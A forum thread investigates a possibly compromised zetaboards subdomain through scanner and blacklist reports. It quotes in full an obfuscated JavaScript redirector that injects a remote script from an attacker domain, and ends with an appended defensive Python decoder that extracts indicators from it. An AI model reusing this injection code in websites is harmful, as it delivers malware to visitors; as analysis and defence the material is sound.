s4.zetaboards.com compromised?

I found something interesting again.

One old forum I’ve visited regularly is under domain “s4.zetaboards.com” which seems to be blacklisted by Norton Safe Web. When the full forum index link is inserted into Sucuri Sitecheck, it shows Norton blacklist and “Site likely compromised”. When only “s4.zetaboards” is inserted, Sucuri seems to auto-correct it into just “zetaboards.com”, which seems clean by Norton.

Alerts:

https://sitecheck.sucuri.net/results/s4.zetaboards.com/stuckheadfirstforum/index/

http://safeweb.norton.com/report/show?url=s4.zetaboards.com

Compare to:

http://safeweb.norton.com/report/show?url=zetaboards.com

https://sitecheck.sucuri.net/results/s4.zetaboards.com

You see that the sub-domain is a bad zone domain when you try to do a DNS scan.
And the issue apparently is with CloudFlare hosting this sub-domain, see: http://toolbar.netcraft.com/site_report?url=s4.zetaboards.com And here you are served up with all the problems for this sub-domain: http://mxtoolbox.com/domain/s4.zetaboards.com/ It redirects now to zetaboards.com; the source is empty.

The other is a registered and active website domain: http://whois.domaintools.com/zetaboards.com
but also with these problems: http://mxtoolbox.com/domain/zetaboards.com/
This seems OK-> http://www.dnsinspect.com/zetaboards.com/1445010624
Tracking goes on via z3.ifrm.com. Z3.ifrm.com does not use HTTP Secure, so none of the communications are encrypted.
It is always a good practice to do online shopping, online transaction with only HTTPS website, as all the information is securely encrypted and cannot be intercepted.

polonus (volunteer website security analyst and website error-hunter)

Pardon if I got it wrong, but were you saying that scanning a subdomain could give false information?

Other zetaboards sub-domain scans I tried didn’t seem to get threats or blacklists.

I checked zetaboards.com in google safe browsing and it got some threats too.

https://www.google.com/safebrowsing/diagnostic?site=zetaboards.com

The negative side here is that all changes in the zone and the subdomain zone require a zone.reload.
Something at Cloudflare did not go right; not only that, bulk subdomains on bulk sub-domain hosters can be abused, so attackers can use the free subdomains for their nefarious ends on Dynamic DNS. Read for some background here: https://labs.opendns.com/2013/04/15/on-the-trail-of-malicious-dynamic-dns-domains/
Also read this: http://www.sabi.co.uk/Notes/linuxDNSZones.html
Cloudflare & Baidu, consider this: https://gigaom.com/2015/09/21/great-catastrophe/

polonus

Hello.

Detection is correct: JS:Redirector-BGS [Trj]
Avast blocks the following malicious code:

< / script > < script type="text/javascript" language="javascript"> document.write ('< ' + ' script type="text/javascript" language="javascript" id="ajh7f1x3qe"> < /' + ' script > '); var j = document.getElementById("ajh7f1x3qe"); var s = document.location.host; var s1 = ""; var qcl2q = 10; for (var i = 0; i < s.length; i++) { var r8j8tnwtk76gj = s.charCodeAt(i) + qcl2q; r8j8tnwtk76gj = 65 + (r8j8tnwtk76gj % 57); s1 += String.fromCharCode(r8j8tnwtk76gj); qcl2q = s.charCodeAt(i);} s1 = s1.replace(/[^a-zA-Z0-9]/g, ""); if( document.cookie.indexOf("google_api=1;") == -1 ) {j.src = "\x68\x74t\x70\x3a\x2f\x2f"+s1+".p\x65\x67\x75a\x72\x64\x73\x2ec\x63/\x625\x31a\x64\x39\x66\x62i\x71\x2f\x67et\x2e\x6as";} delete s; delete s1;

Domain in Blacklist
http://www.urlvoid.com/scan/s4.zetaboards.com/

also pointed out by other antivirus solutions.

Result

https://www.virustotal.com/en/file/48f426a262077b15218cffde4aa1eec117596d4401b90848ea04ccc8ae04df3f/analysis/1445129174/
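The blocked snippet quoted above builds its beacon hostname from the visited site's own hostname (the loop over document.location.host) and hides the rest of the URL behind \xHH escapes. For a defender the useful output is the set of indicators: the decoded URL pattern, the per-site beacon host, and the two markers the script leaves behind (the cookie it checks and the id of the script element it injects). The script below is an added analysis example, not code from the forum post or from Avast; it copies the two escaped string fragments verbatim from the quoted snippet and re-implements the host transform in Python so the indicators can be computed for any hostname (s4.zetaboards.com is the one from this thread).

```python
import re

# The two obfuscated string literals, copied as-is from the JS quoted in the post.
JS_URL_PREFIX = r"\x68\x74t\x70\x3a\x2f\x2f"
JS_URL_SUFFIX = (
    r".p\x65\x67\x75a\x72\x64\x73\x2ec\x63/"
    r"\x625\x31a\x64\x39\x66\x62i\x71\x2f\x67et\x2e\x6as"
)
COOKIE_MARKER = "google_api=1;"   # the script only injects when this cookie is absent
SCRIPT_ELEMENT_ID = "ajh7f1x3qe"  # id of the <script> element it document.write()s


def decode_js_hex(literal: str) -> str:
    """Resolve JavaScript \\xHH escapes (exactly two hex digits, as JS does)."""
    return re.sub(r"\\x([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), literal)


def derive_label(host: str) -> str:
    """Re-implementation of the snippet's host-to-label loop.

    Mirrors the JS step for step: a running key seeded with 10 and replaced by
    the previous character code, 65 + ((code + key) % 57), then the regex strip.
    Values 65..121 cover A-Z, the six punctuation codes 91..96, and a-y; the
    strip removes the punctuation, so the label is shorter than the host when
    one of those codes is hit.
    """
    key = 10
    out = []
    for ch in host:
        code = ord(ch)
        out.append(chr(65 + ((code + key) % 57)))
        key = code
    return re.sub(r"[^a-zA-Z0-9]", "", "".join(out))


def beacon_url(host: str) -> str:
    """The URL the injected <script> would fetch when loaded from `host`."""
    return decode_js_hex(JS_URL_PREFIX) + derive_label(host) + decode_js_hex(JS_URL_SUFFIX)


def extract_indicators(host: str) -> dict:
    """Indicators to feed into DNS/proxy blocklists and page-inspection rules."""
    url = beacon_url(host)
    beacon_host = url.split("/")[2]
    return {
        "beacon_url": url,
        "beacon_host": beacon_host,
        # The label changes per site; the registrable domain does not, so that
        # is the sensible unit to block rather than each derived subdomain.
        "parent_domain": ".".join(beacon_host.split(".")[-2:]),
        "cookie_marker": COOKIE_MARKER,
        "script_element_id": SCRIPT_ELEMENT_ID,
    }


if __name__ == "__main__":
    for h in ("s4.zetaboards.com", "zetaboards.com"):
        for k, v in extract_indicators(h).items():
            print(f"{h:>20}  {k:<18} {v}")
```

Running it shows why a scanner's verdict differs between s4.zetaboards.com and zetaboards.com: each hostname yields a different beacon subdomain under the same parent domain, so a per-host scan sees a different indicator while the parent domain is the stable thing to block or alert on. The cookie marker and the fixed element id are the cheap page-side checks for spotting the injection itself.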